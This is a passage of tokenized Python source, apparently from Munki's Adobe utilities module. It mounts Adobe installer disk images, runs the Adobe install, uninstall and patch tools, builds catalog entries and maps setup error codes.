display_status_minor ( '<STR_LIT>' ) <EOL> return retcode <EOL> def runAdobeSetup ( dmgpath , uninstalling = False , payloads = None ) : <EOL> '''<STR_LIT>''' <EOL> munkicommon . display_status_minor ( <EOL> '<STR_LIT>' % os . path . basename ( dmgpath ) ) <EOL> mountpoints = mountAdobeDmg ( dmgpath ) <EOL> if mountpoints : <EOL> setup_path = findSetupApp ( mountpoints [ <NUM_LIT:0> ] ) <EOL> if setup_path : <EOL> deploymentfile = None <EOL> installxml = os . path . join ( mountpoints [ <NUM_LIT:0> ] , "<STR_LIT>" ) <EOL> uninstallxml = os . path . join ( mountpoints [ <NUM_LIT:0> ] , "<STR_LIT>" ) <EOL> if uninstalling : <EOL> operation = '<STR_LIT>' <EOL> if os . path . exists ( uninstallxml ) : <EOL> deploymentfile = uninstallxml <EOL> else : <EOL> munkicommon . unmountdmg ( mountpoints [ <NUM_LIT:0> ] ) <EOL> munkicommon . display_error ( <EOL> '<STR_LIT>' , <EOL> os . path . basename ( dmgpath ) ) <EOL> return - <NUM_LIT:1> <EOL> else : <EOL> operation = '<STR_LIT>' <EOL> if os . path . exists ( installxml ) : <EOL> deploymentfile = installxml <EOL> number_of_payloads = countPayloads ( mountpoints [ <NUM_LIT:0> ] ) <EOL> munkicommon . display_status_minor ( '<STR_LIT>' ) <EOL> adobe_setup = [ setup_path , '<STR_LIT>' , '<STR_LIT>' ] <EOL> if deploymentfile : <EOL> adobe_setup . append ( '<STR_LIT>' % deploymentfile ) <EOL> retcode = runAdobeInstallTool ( <EOL> adobe_setup , number_of_payloads , payloads = payloads , <EOL> kind = '<STR_LIT>' , operation = operation ) <EOL> else : <EOL> munkicommon . display_error ( <EOL> '<STR_LIT>' % <EOL> os . path . basename ( dmgpath ) ) <EOL> retcode = - <NUM_LIT:1> <EOL> munkicommon . unmountdmg ( mountpoints [ <NUM_LIT:0> ] ) <EOL> return retcode <EOL> else : <EOL> munkicommon . 
display_error ( '<STR_LIT>' % dmgpath ) <EOL> return - <NUM_LIT:1> <EOL> def writefile ( stringdata , path ) : <EOL> '''<STR_LIT>''' <EOL> try : <EOL> fileobject = open ( path , mode = '<STR_LIT:w>' , buffering = <NUM_LIT:1> ) <EOL> print >> fileobject , stringdata . encode ( '<STR_LIT>' ) <EOL> fileobject . close ( ) <EOL> return path <EOL> except ( OSError , IOError ) : <EOL> munkicommon . display_error ( "<STR_LIT>" % stringdata ) <EOL> return "<STR_LIT>" <EOL> def doAdobeCS5Uninstall ( adobeInstallInfo , payloads = None ) : <EOL> '''<STR_LIT>''' <EOL> uninstallxml = adobeInstallInfo . get ( '<STR_LIT>' ) <EOL> if not uninstallxml : <EOL> munkicommon . display_error ( "<STR_LIT>" ) <EOL> return - <NUM_LIT:1> <EOL> payloadcount = adobeInstallInfo . get ( '<STR_LIT>' , <NUM_LIT:0> ) <EOL> path = os . path . join ( munkicommon . tmpdir ( ) , "<STR_LIT>" ) <EOL> deploymentFile = writefile ( uninstallxml , path ) <EOL> if not deploymentFile : <EOL> return - <NUM_LIT:1> <EOL> setupapp = "<STR_LIT>" <EOL> setup = os . path . join ( setupapp , "<STR_LIT>" ) <EOL> if not os . path . exists ( setup ) : <EOL> munkicommon . display_error ( "<STR_LIT>" % setupapp ) <EOL> return - <NUM_LIT:1> <EOL> uninstall_cmd = [ setup , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' % deploymentFile ] <EOL> munkicommon . display_status_minor ( '<STR_LIT>' ) <EOL> return runAdobeInstallTool ( uninstall_cmd , payloadcount , payloads = payloads , <EOL> kind = '<STR_LIT>' , operation = '<STR_LIT>' ) <EOL> def runAdobeCCPpkgScript ( dmgpath , payloads = None , operation = '<STR_LIT>' ) : <EOL> '''<STR_LIT>''' <EOL> munkicommon . display_status_minor ( <EOL> '<STR_LIT>' % os . path . basename ( dmgpath ) ) <EOL> mountpoints = mountAdobeDmg ( dmgpath ) <EOL> if not mountpoints : <EOL> munkicommon . 
display_error ( "<STR_LIT>" % dmgpath ) <EOL> return - <NUM_LIT:1> <EOL> deploymentmanager = findAdobeDeploymentManager ( mountpoints [ <NUM_LIT:0> ] ) <EOL> if not deploymentmanager : <EOL> munkicommon . display_error ( <EOL> '<STR_LIT>' , <EOL> os . path . basename ( dmgpath ) ) <EOL> munkicommon . unmountdmg ( mountpoints [ <NUM_LIT:0> ] ) <EOL> return - <NUM_LIT:1> <EOL> basepath = os . path . dirname ( deploymentmanager ) <EOL> preinstall_script = os . path . join ( basepath , "<STR_LIT>" ) <EOL> if not os . path . exists ( preinstall_script ) : <EOL> if operation == '<STR_LIT>' : <EOL> munkicommon . display_error ( <EOL> "<STR_LIT>" % dmgpath ) <EOL> else : <EOL> munkicommon . display_error ( <EOL> "<STR_LIT>" % dmgpath ) <EOL> munkicommon . unmountdmg ( mountpoints [ <NUM_LIT:0> ] ) <EOL> return - <NUM_LIT:1> <EOL> number_of_payloads = countPayloads ( basepath ) <EOL> tmpdir = tempfile . mkdtemp ( prefix = '<STR_LIT>' , dir = '<STR_LIT>' ) <EOL> for dir_name in [ '<STR_LIT>' '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] : <EOL> if os . path . isdir ( os . path . join ( basepath , dir_name ) ) : <EOL> os . symlink ( os . path . join ( basepath , dir_name ) , <EOL> os . path . join ( tmpdir , dir_name ) ) <EOL> for dir_name in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> realdir = os . path . join ( basepath , dir_name ) <EOL> if os . path . isdir ( realdir ) : <EOL> tmpsubdir = os . path . join ( tmpdir , dir_name ) <EOL> os . mkdir ( tmpsubdir ) <EOL> for item in munkicommon . listdir ( realdir ) : <EOL> os . symlink ( os . path . join ( realdir , item ) , <EOL> os . path . join ( tmpsubdir , item ) ) <EOL> os_version_tuple = munkicommon . getOsVersion ( as_tuple = True ) <EOL> if ( os_version_tuple < ( <NUM_LIT:10> , <NUM_LIT:11> ) and <EOL> ( not munkicommon . getconsoleuser ( ) or <EOL> munkicommon . getconsoleuser ( ) == u"<STR_LIT>" ) ) : <EOL> loginwindowPID = utils . 
getPIDforProcessName ( "<STR_LIT>" ) <EOL> cmd = [ '<STR_LIT>' , '<STR_LIT>' , loginwindowPID ] <EOL> else : <EOL> cmd = [ ] <EOL> pkg_dir = os . path . dirname ( os . path . dirname ( basepath ) ) <EOL> cmd . extend ( [ preinstall_script , pkg_dir , '<STR_LIT:/>' , '<STR_LIT:/>' ] ) <EOL> if operation == '<STR_LIT>' : <EOL> munkicommon . display_status_minor ( '<STR_LIT>' ) <EOL> retcode = runAdobeInstallTool ( <EOL> cmd , number_of_payloads , killAdobeAIR = True , payloads = payloads , <EOL> kind = '<STR_LIT>' , operation = operation ) <EOL> dummy_result = subprocess . call ( [ "<STR_LIT>" , "<STR_LIT>" , tmpdir ] ) <EOL> munkicommon . unmountdmg ( mountpoints [ <NUM_LIT:0> ] ) <EOL> return retcode <EOL> def runAdobeCS5AAMEEInstall ( dmgpath , payloads = None ) : <EOL> '''<STR_LIT>''' <EOL> munkicommon . display_status_minor ( <EOL> '<STR_LIT>' % os . path . basename ( dmgpath ) ) <EOL> mountpoints = mountAdobeDmg ( dmgpath ) <EOL> if not mountpoints : <EOL> munkicommon . display_error ( "<STR_LIT>" % dmgpath ) <EOL> return - <NUM_LIT:1> <EOL> deploymentmanager = findAdobeDeploymentManager ( mountpoints [ <NUM_LIT:0> ] ) <EOL> if deploymentmanager : <EOL> basepath = os . path . dirname ( deploymentmanager ) <EOL> number_of_payloads = countPayloads ( basepath ) <EOL> tmpdir = tempfile . mkdtemp ( prefix = '<STR_LIT>' , dir = '<STR_LIT>' ) <EOL> os . symlink ( os . path . join ( basepath , "<STR_LIT>" ) , os . path . join ( tmpdir , "<STR_LIT>" ) ) <EOL> os . symlink ( os . path . join ( basepath , "<STR_LIT>" ) , <EOL> os . path . join ( tmpdir , "<STR_LIT>" ) ) <EOL> for dir_name in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> realdir = os . path . join ( basepath , dir_name ) <EOL> if os . path . isdir ( realdir ) : <EOL> tmpsubdir = os . path . join ( tmpdir , dir_name ) <EOL> os . mkdir ( tmpsubdir ) <EOL> for item in munkicommon . listdir ( realdir ) : <EOL> os . symlink ( <EOL> os . path . join ( realdir , item ) , <EOL> os . path . 
join ( tmpsubdir , item ) ) <EOL> optionXMLfile = os . path . join ( basepath , "<STR_LIT>" ) <EOL> os_version_tuple = munkicommon . getOsVersion ( as_tuple = True ) <EOL> if ( os_version_tuple < ( <NUM_LIT:10> , <NUM_LIT:11> ) and <EOL> ( not munkicommon . getconsoleuser ( ) or <EOL> munkicommon . getconsoleuser ( ) == u"<STR_LIT>" ) ) : <EOL> loginwindowPID = utils . getPIDforProcessName ( "<STR_LIT>" ) <EOL> cmd = [ '<STR_LIT>' , '<STR_LIT>' , loginwindowPID ] <EOL> else : <EOL> cmd = [ ] <EOL> cmd . extend ( [ deploymentmanager , '<STR_LIT>' % optionXMLfile , <EOL> '<STR_LIT>' % basepath , '<STR_LIT>' , <EOL> '<STR_LIT>' ] ) <EOL> munkicommon . display_status_minor ( '<STR_LIT>' ) <EOL> retcode = runAdobeInstallTool ( <EOL> cmd , number_of_payloads , killAdobeAIR = True , payloads = payloads , <EOL> kind = '<STR_LIT>' , operation = '<STR_LIT>' ) <EOL> dummy_result = subprocess . call ( [ "<STR_LIT>" , "<STR_LIT>" , tmpdir ] ) <EOL> else : <EOL> munkicommon . display_error ( <EOL> '<STR_LIT>' , <EOL> os . path . basename ( dmgpath ) ) <EOL> retcode = - <NUM_LIT:1> <EOL> munkicommon . unmountdmg ( mountpoints [ <NUM_LIT:0> ] ) <EOL> return retcode <EOL> def runAdobeCS5PatchInstaller ( dmgpath , copylocal = False , payloads = None ) : <EOL> '''<STR_LIT>''' <EOL> munkicommon . display_status_minor ( <EOL> '<STR_LIT>' % os . path . basename ( dmgpath ) ) <EOL> mountpoints = mountAdobeDmg ( dmgpath ) <EOL> if mountpoints : <EOL> if copylocal : <EOL> updatedir = tempfile . mkdtemp ( prefix = '<STR_LIT>' , dir = '<STR_LIT>' ) <EOL> retcode = subprocess . call ( <EOL> [ "<STR_LIT>" , "<STR_LIT>" , mountpoints [ <NUM_LIT:0> ] , updatedir ] ) <EOL> munkicommon . unmountdmg ( mountpoints [ <NUM_LIT:0> ] ) <EOL> if retcode : <EOL> munkicommon . display_error ( <EOL> '<STR_LIT>' % dmgpath ) <EOL> return - <NUM_LIT:1> <EOL> dummy_result = subprocess . 
call ( [ "<STR_LIT>" , dmgpath ] ) <EOL> else : <EOL> updatedir = mountpoints [ <NUM_LIT:0> ] <EOL> patchinstaller = findAdobePatchInstallerApp ( updatedir ) <EOL> if patchinstaller : <EOL> number_of_payloads = countPayloads ( updatedir ) <EOL> munkicommon . display_status_minor ( '<STR_LIT>' ) <EOL> install_cmd = [ patchinstaller , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> retcode = runAdobeInstallTool ( install_cmd , <EOL> number_of_payloads , payloads = payloads , <EOL> kind = '<STR_LIT>' , operation = '<STR_LIT>' ) <EOL> else : <EOL> munkicommon . display_error ( <EOL> "<STR_LIT>" , <EOL> os . path . basename ( dmgpath ) ) <EOL> retcode = - <NUM_LIT:1> <EOL> if copylocal : <EOL> dummy_result = subprocess . call ( [ "<STR_LIT>" , "<STR_LIT>" , updatedir ] ) <EOL> else : <EOL> munkicommon . unmountdmg ( mountpoints [ <NUM_LIT:0> ] ) <EOL> return retcode <EOL> else : <EOL> munkicommon . display_error ( '<STR_LIT>' % dmgpath ) <EOL> return - <NUM_LIT:1> <EOL> def runAdobeUberTool ( dmgpath , pkgname = '<STR_LIT>' , uninstalling = False , payloads = None ) : <EOL> '''<STR_LIT>''' <EOL> munkicommon . display_status_minor ( <EOL> '<STR_LIT>' % os . path . basename ( dmgpath ) ) <EOL> mountpoints = mountAdobeDmg ( dmgpath ) <EOL> if mountpoints : <EOL> installroot = mountpoints [ <NUM_LIT:0> ] <EOL> if uninstalling : <EOL> ubertool = os . path . join ( installroot , pkgname , <EOL> "<STR_LIT>" ) <EOL> else : <EOL> ubertool = os . path . join ( installroot , pkgname , <EOL> "<STR_LIT>" ) <EOL> if os . path . exists ( ubertool ) : <EOL> info = getAdobePackageInfo ( installroot ) <EOL> packagename = info [ '<STR_LIT>' ] <EOL> action = "<STR_LIT>" <EOL> operation = "<STR_LIT>" <EOL> if uninstalling : <EOL> action = "<STR_LIT>" <EOL> operation = "<STR_LIT>" <EOL> munkicommon . display_status_major ( '<STR_LIT>' % ( action , packagename ) ) <EOL> if munkicommon . munkistatusoutput : <EOL> munkistatus . detail ( '<STR_LIT>' % os . path . 
basename ( ubertool ) ) <EOL> number_of_payloads = countPayloads ( installroot ) <EOL> retcode = runAdobeInstallTool ( <EOL> [ ubertool ] , number_of_payloads , killAdobeAIR = True , <EOL> payloads = payloads , kind = '<STR_LIT>' , operation = operation ) <EOL> else : <EOL> munkicommon . display_error ( "<STR_LIT>" % ubertool ) <EOL> retcode = - <NUM_LIT:1> <EOL> munkicommon . unmountdmg ( installroot ) <EOL> return retcode <EOL> else : <EOL> munkicommon . display_error ( "<STR_LIT>" % dmgpath ) <EOL> return - <NUM_LIT:1> <EOL> def findAcrobatPatchApp ( dirpath ) : <EOL> '''<STR_LIT>''' <EOL> for ( path , dummy_dirs , dummy_files ) in os . walk ( dirpath ) : <EOL> if path . endswith ( "<STR_LIT>" ) : <EOL> patch_script_path = os . path . join ( <EOL> path , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> if os . path . exists ( patch_script_path ) : <EOL> return path <EOL> return '<STR_LIT>' <EOL> def updateAcrobatPro ( dmgpath ) : <EOL> """<STR_LIT>""" <EOL> if munkicommon . munkistatusoutput : <EOL> munkistatus . percent ( - <NUM_LIT:1> ) <EOL> munkicommon . display_status_minor ( <EOL> '<STR_LIT>' % os . path . basename ( dmgpath ) ) <EOL> mountpoints = mountAdobeDmg ( dmgpath ) <EOL> if mountpoints : <EOL> installroot = mountpoints [ <NUM_LIT:0> ] <EOL> pathToAcrobatPatchApp = findAcrobatPatchApp ( installroot ) <EOL> else : <EOL> munkicommon . display_error ( "<STR_LIT>" % dmgpath ) <EOL> return - <NUM_LIT:1> <EOL> if not pathToAcrobatPatchApp : <EOL> munkicommon . display_error ( <EOL> '<STR_LIT>' , pathToAcrobatPatchApp ) <EOL> munkicommon . unmountdmg ( installroot ) <EOL> return - <NUM_LIT:1> <EOL> resourcesDir = os . path . join ( <EOL> pathToAcrobatPatchApp , '<STR_LIT>' , '<STR_LIT>' ) <EOL> ApplyOperation = os . path . join ( resourcesDir , '<STR_LIT>' ) <EOL> callingScriptPath = os . path . join ( resourcesDir , '<STR_LIT>' ) <EOL> appList = [ ] <EOL> appListFile = os . path . join ( resourcesDir , '<STR_LIT>' ) <EOL> if os . path . 
exists ( appListFile ) : <EOL> fileobj = open ( appListFile , mode = '<STR_LIT:r>' , buffering = - <NUM_LIT:1> ) <EOL> if fileobj : <EOL> for line in fileobj . readlines ( ) : <EOL> appList . append ( line ) <EOL> fileobj . close ( ) <EOL> if not appList : <EOL> munkicommon . display_error ( '<STR_LIT>' ) <EOL> munkicommon . unmountdmg ( installroot ) <EOL> return - <NUM_LIT:1> <EOL> payloadNum = - <NUM_LIT:1> <EOL> for line in appList : <EOL> payloadNum = payloadNum + <NUM_LIT:1> <EOL> if munkicommon . munkistatusoutput : <EOL> munkistatus . percent ( getPercent ( payloadNum + <NUM_LIT:1> , len ( appList ) + <NUM_LIT:1> ) ) <EOL> ( appname , status ) = line . split ( "<STR_LIT:\t>" ) <EOL> munkicommon . display_status_minor ( '<STR_LIT>' % appname ) <EOL> pathname = os . path . join ( "<STR_LIT>" , appname ) <EOL> if os . path . exists ( pathname ) : <EOL> item = { } <EOL> item [ '<STR_LIT:path>' ] = pathname <EOL> candidates = [ item ] <EOL> else : <EOL> candidates = [ item for item in munkicommon . getAppData ( ) <EOL> if item [ '<STR_LIT:path>' ] . endswith ( '<STR_LIT:/>' + appname ) ] <EOL> if len ( candidates ) == <NUM_LIT:0> : <EOL> if status == "<STR_LIT>" : <EOL> continue <EOL> else : <EOL> munkicommon . display_error ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" % appname ) <EOL> munkicommon . unmountdmg ( installroot ) <EOL> return - <NUM_LIT:1> <EOL> if len ( candidates ) > <NUM_LIT:1> : <EOL> munkicommon . display_error ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" % appname ) <EOL> munkicommon . unmountdmg ( installroot ) <EOL> return - <NUM_LIT:1> <EOL> munkicommon . display_status_minor ( '<STR_LIT>' % appname ) <EOL> apppath = os . path . dirname ( candidates [ <NUM_LIT:0> ] [ "<STR_LIT:path>" ] ) <EOL> cmd = [ ApplyOperation , apppath , appname , resourcesDir , <EOL> callingScriptPath , str ( payloadNum ) ] <EOL> proc = subprocess . Popen ( cmd , shell = False , bufsize = - <NUM_LIT:1> , <EOL> stdin = subprocess . 
PIPE , <EOL> stdout = subprocess . PIPE , <EOL> stderr = subprocess . STDOUT ) <EOL> while proc . poll ( ) == None : <EOL> time . sleep ( <NUM_LIT:1> ) <EOL> retcode = proc . poll ( ) <EOL> if retcode != <NUM_LIT:0> : <EOL> munkicommon . display_error ( <EOL> '<STR_LIT>' , appname , retcode ) <EOL> break <EOL> else : <EOL> munkicommon . display_status_minor ( '<STR_LIT>' , appname ) <EOL> munkicommon . display_status_minor ( '<STR_LIT>' ) <EOL> if munkicommon . munkistatusoutput : <EOL> munkistatus . percent ( <NUM_LIT:100> ) <EOL> munkicommon . unmountdmg ( installroot ) <EOL> return retcode <EOL> def getBundleInfo ( path ) : <EOL> """<STR_LIT>""" <EOL> infopath = os . path . join ( path , "<STR_LIT>" , "<STR_LIT>" ) <EOL> if not os . path . exists ( infopath ) : <EOL> infopath = os . path . join ( path , "<STR_LIT>" , "<STR_LIT>" ) <EOL> if os . path . exists ( infopath ) : <EOL> try : <EOL> plist = FoundationPlist . readPlist ( infopath ) <EOL> return plist <EOL> except FoundationPlist . NSPropertyListSerializationException : <EOL> pass <EOL> return None <EOL> def getAdobeInstallInfo ( installdir ) : <EOL> '''<STR_LIT>''' <EOL> adobeInstallInfo = { } <EOL> if installdir : <EOL> adobeInstallInfo [ '<STR_LIT>' ] = getCS5mediaSignature ( installdir ) <EOL> adobeInstallInfo [ '<STR_LIT>' ] = countPayloads ( installdir ) <EOL> optionXMLfile = os . path . join ( installdir , "<STR_LIT>" ) <EOL> if os . path . exists ( optionXMLfile ) : <EOL> adobeInstallInfo [ '<STR_LIT>' ] = getCS5uninstallXML ( optionXMLfile ) <EOL> return adobeInstallInfo <EOL> def getAdobeCatalogInfo ( mountpoint , pkgname = "<STR_LIT>" ) : <EOL> '''<STR_LIT>''' <EOL> deploymentmanager = findAdobeDeploymentManager ( mountpoint ) <EOL> if deploymentmanager : <EOL> dirpath = os . path . dirname ( deploymentmanager ) <EOL> option_xml_file = os . path . join ( dirpath , '<STR_LIT>' ) <EOL> option_xml_info = { } <EOL> if os . path . 
exists ( option_xml_file ) : <EOL> option_xml_info = parseOptionXML ( option_xml_file ) <EOL> cataloginfo = getAdobePackageInfo ( dirpath ) <EOL> if cataloginfo : <EOL> if option_xml_info . get ( '<STR_LIT>' ) == u'<STR_LIT>' : <EOL> cataloginfo [ '<STR_LIT>' ] = option_xml_info . get ( <EOL> '<STR_LIT>' , '<STR_LIT>' ) <EOL> cataloginfo [ '<STR_LIT:name>' ] = cataloginfo [ '<STR_LIT>' ] . replace ( <EOL> '<STR_LIT:U+0020>' , '<STR_LIT>' ) <EOL> cataloginfo [ '<STR_LIT>' ] = True <EOL> cataloginfo [ '<STR_LIT>' ] = "<STR_LIT>" <EOL> cataloginfo [ '<STR_LIT>' ] = "<STR_LIT>" <EOL> cataloginfo [ '<STR_LIT>' ] = "<STR_LIT>" <EOL> mediasignatures = [ <EOL> item [ '<STR_LIT>' ] <EOL> for item in option_xml_info . get ( '<STR_LIT>' , [ ] ) <EOL> if '<STR_LIT>' in item ] <EOL> else : <EOL> cataloginfo [ '<STR_LIT:name>' ] = cataloginfo [ '<STR_LIT>' ] . replace ( <EOL> '<STR_LIT:U+0020>' , '<STR_LIT>' ) <EOL> cataloginfo [ '<STR_LIT>' ] = True <EOL> cataloginfo [ '<STR_LIT>' ] = "<STR_LIT>" <EOL> cataloginfo [ '<STR_LIT>' ] = "<STR_LIT>" <EOL> cataloginfo [ '<STR_LIT>' ] = "<STR_LIT>" <EOL> cataloginfo [ '<STR_LIT>' ] = getAdobeInstallInfo ( <EOL> installdir = dirpath ) <EOL> mediasignature = cataloginfo [ '<STR_LIT>' ] . get ( <EOL> "<STR_LIT>" ) <EOL> mediasignatures = [ mediasignature ] <EOL> if mediasignatures : <EOL> uninstalldir = "<STR_LIT>" <EOL> installs = [ ] <EOL> for mediasignature in mediasignatures : <EOL> signaturefile = mediasignature + "<STR_LIT>" <EOL> filepath = os . path . join ( uninstalldir , signaturefile ) <EOL> installitem = { } <EOL> installitem [ '<STR_LIT:path>' ] = filepath <EOL> installitem [ '<STR_LIT:type>' ] = '<STR_LIT:file>' <EOL> installs . 
append ( installitem ) <EOL> cataloginfo [ '<STR_LIT>' ] = installs <EOL> return cataloginfo <EOL> installapp = findInstallApp ( mountpoint ) <EOL> if installapp : <EOL> cataloginfo = { } <EOL> cataloginfo [ '<STR_LIT>' ] = "<STR_LIT>" <EOL> return cataloginfo <EOL> installapp = findAdobePatchInstallerApp ( mountpoint ) <EOL> if os . path . exists ( installapp ) : <EOL> cataloginfo = getAdobePackageInfo ( mountpoint ) <EOL> if cataloginfo : <EOL> cataloginfo [ '<STR_LIT:name>' ] = cataloginfo [ '<STR_LIT>' ] . replace ( '<STR_LIT:U+0020>' , '<STR_LIT>' ) <EOL> cataloginfo [ '<STR_LIT>' ] = False <EOL> cataloginfo [ '<STR_LIT>' ] = "<STR_LIT>" <EOL> if pkgname : <EOL> cataloginfo [ '<STR_LIT>' ] = pkgname <EOL> installs = [ ] <EOL> uninstalldir = "<STR_LIT>" <EOL> for payload in cataloginfo . get ( '<STR_LIT>' , [ ] ) : <EOL> if ( payload . get ( '<STR_LIT>' , '<STR_LIT>' ) == <EOL> cataloginfo [ '<STR_LIT>' ] ) : <EOL> if '<STR_LIT>' in payload : <EOL> dbfile = payload [ '<STR_LIT>' ] + "<STR_LIT>" <EOL> filepath = os . path . join ( uninstalldir , dbfile ) <EOL> installitem = { } <EOL> installitem [ '<STR_LIT:path>' ] = filepath <EOL> installitem [ '<STR_LIT:type>' ] = '<STR_LIT:file>' <EOL> installs . append ( installitem ) <EOL> break <EOL> if installs == [ ] : <EOL> for payload in cataloginfo . get ( '<STR_LIT>' , [ ] ) : <EOL> if '<STR_LIT>' in payload : <EOL> if ( "<STR_LIT>" in payload . get ( "<STR_LIT>" ) or <EOL> "<STR_LIT>" in payload . get ( <EOL> "<STR_LIT>" ) ) : <EOL> continue <EOL> dbfile = payload [ '<STR_LIT>' ] + "<STR_LIT>" <EOL> filepath = os . path . join ( uninstalldir , dbfile ) <EOL> installitem = { } <EOL> installitem [ '<STR_LIT:path>' ] = filepath <EOL> installitem [ '<STR_LIT:type>' ] = '<STR_LIT:file>' <EOL> installs . append ( installitem ) <EOL> cataloginfo [ '<STR_LIT>' ] = installs <EOL> return cataloginfo <EOL> pkgroot = os . path . join ( mountpoint , pkgname ) <EOL> adobeinstallxml = os . path . 
join ( pkgroot , "<STR_LIT>" ) <EOL> if os . path . exists ( adobeinstallxml ) : <EOL> cataloginfo = getAdobePackageInfo ( pkgroot ) <EOL> if cataloginfo : <EOL> cataloginfo [ '<STR_LIT:name>' ] = cataloginfo [ '<STR_LIT>' ] . replace ( '<STR_LIT:U+0020>' , '<STR_LIT>' ) <EOL> cataloginfo [ '<STR_LIT>' ] = True <EOL> cataloginfo [ '<STR_LIT>' ] = "<STR_LIT>" <EOL> cataloginfo [ '<STR_LIT>' ] = "<STR_LIT>" <EOL> if pkgname : <EOL> cataloginfo [ '<STR_LIT>' ] = pkgname <EOL> return cataloginfo <EOL> setuppath = findSetupApp ( mountpoint ) <EOL> if setuppath : <EOL> cataloginfo = getAdobeSetupInfo ( mountpoint ) <EOL> if cataloginfo : <EOL> cataloginfo [ '<STR_LIT:name>' ] = cataloginfo [ '<STR_LIT>' ] . replace ( '<STR_LIT:U+0020>' , '<STR_LIT>' ) <EOL> cataloginfo [ '<STR_LIT>' ] = "<STR_LIT>" <EOL> if cataloginfo . get ( '<STR_LIT>' ) == "<STR_LIT>" : <EOL> cataloginfo [ '<STR_LIT>' ] = True <EOL> cataloginfo [ '<STR_LIT>' ] = "<STR_LIT>" <EOL> else : <EOL> cataloginfo [ '<STR_LIT:description>' ] = "<STR_LIT>" <EOL> cataloginfo [ '<STR_LIT>' ] = False <EOL> cataloginfo [ '<STR_LIT>' ] = [ "<STR_LIT>" ] <EOL> return cataloginfo <EOL> acrobatpatcherapp = findAcrobatPatchApp ( mountpoint ) <EOL> if acrobatpatcherapp : <EOL> cataloginfo = { } <EOL> cataloginfo [ '<STR_LIT>' ] = "<STR_LIT>" <EOL> cataloginfo [ '<STR_LIT>' ] = False <EOL> plist = getBundleInfo ( acrobatpatcherapp ) <EOL> cataloginfo [ '<STR_LIT:version>' ] = munkicommon . 
getVersionString ( plist ) <EOL> cataloginfo [ '<STR_LIT:name>' ] = "<STR_LIT>" <EOL> cataloginfo [ '<STR_LIT>' ] = "<STR_LIT>" <EOL> cataloginfo [ '<STR_LIT>' ] = [ "<STR_LIT>" ] <EOL> cataloginfo [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> cataloginfo [ '<STR_LIT>' ] = [ ] <EOL> cataloginfo [ '<STR_LIT>' ] = [ <EOL> { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : cataloginfo [ '<STR_LIT:version>' ] , <EOL> '<STR_LIT:path>' : '<STR_LIT>' , <EOL> '<STR_LIT:type>' : '<STR_LIT>' } <EOL> ] <EOL> return cataloginfo <EOL> return None <EOL> def adobeSetupError ( errorcode ) : <EOL> '''<STR_LIT>''' <EOL> errormessage = { <EOL> <NUM_LIT:0> : "<STR_LIT>" , <EOL> <NUM_LIT:1> : "<STR_LIT>" , <EOL> <NUM_LIT:2> : "<STR_LIT>" , <EOL> <NUM_LIT:3> : "<STR_LIT>" , <EOL> <NUM_LIT:4> : "<STR_LIT>" , <EOL> <NUM_LIT:5> : "<STR_LIT>" , <EOL> <NUM_LIT:6> : "<STR_LIT>" , <EOL> <NUM_LIT:7> : "<STR_LIT>" , <EOL> <NUM_LIT:8> : "<STR_LIT>" , <EOL> <NUM_LIT:9> : "<STR_LIT>" , <EOL> <NUM_LIT:10> : "<STR_LIT>" , <EOL> <NUM_LIT:11> : "<STR_LIT>" , <EOL> <NUM_LIT:12> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT:15> : "<STR_LIT>" , <EOL> <NUM_LIT:16> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT:20> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT:30> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT:32> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> - <NUM_LIT:1> : "<STR_LIT>" } <EOL> return errormessage . 
get ( errorcode , "<STR_LIT>" ) <EOL> def doAdobeRemoval ( item ) : <EOL> '''<STR_LIT>''' <EOL> uninstallmethod = item [ '<STR_LIT>' ] <EOL> payloads = item . get ( "<STR_LIT>" ) <EOL> itempath = "<STR_LIT>" <EOL> if "<STR_LIT>" in item : <EOL> managedinstallbase = munkicommon . pref ( '<STR_LIT>' ) <EOL> itempath = os . path . join ( managedinstallbase , '<STR_LIT>' , <EOL> item [ "<STR_LIT>" ] ) <EOL> if not os . path . exists ( itempath ) : <EOL> munkicommon . display_error ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> % ( uninstallmethod , item [ '<STR_LIT:name>' ] ) ) <EOL> return - <NUM_LIT:1> <EOL> if uninstallmethod == "<STR_LIT>" : <EOL> retcode = runAdobeSetup ( itempath , uninstalling = True , payloads = payloads ) <EOL> elif uninstallmethod == "<STR_LIT>" : <EOL> pkgname = item . get ( "<STR_LIT>" ) or item . get ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> retcode = runAdobeUberTool ( <EOL> itempath , pkgname , uninstalling = True , payloads = payloads ) <EOL> elif uninstallmethod == "<STR_LIT>" : <EOL> adobeInstallInfo = item . get ( '<STR_LIT>' ) <EOL> retcode = doAdobeCS5Uninstall ( adobeInstallInfo , payloads = payloads ) <EOL> elif uninstallmethod == "<STR_LIT>" : <EOL> retcode = runAdobeCCPpkgScript ( <EOL> itempath , payloads = payloads 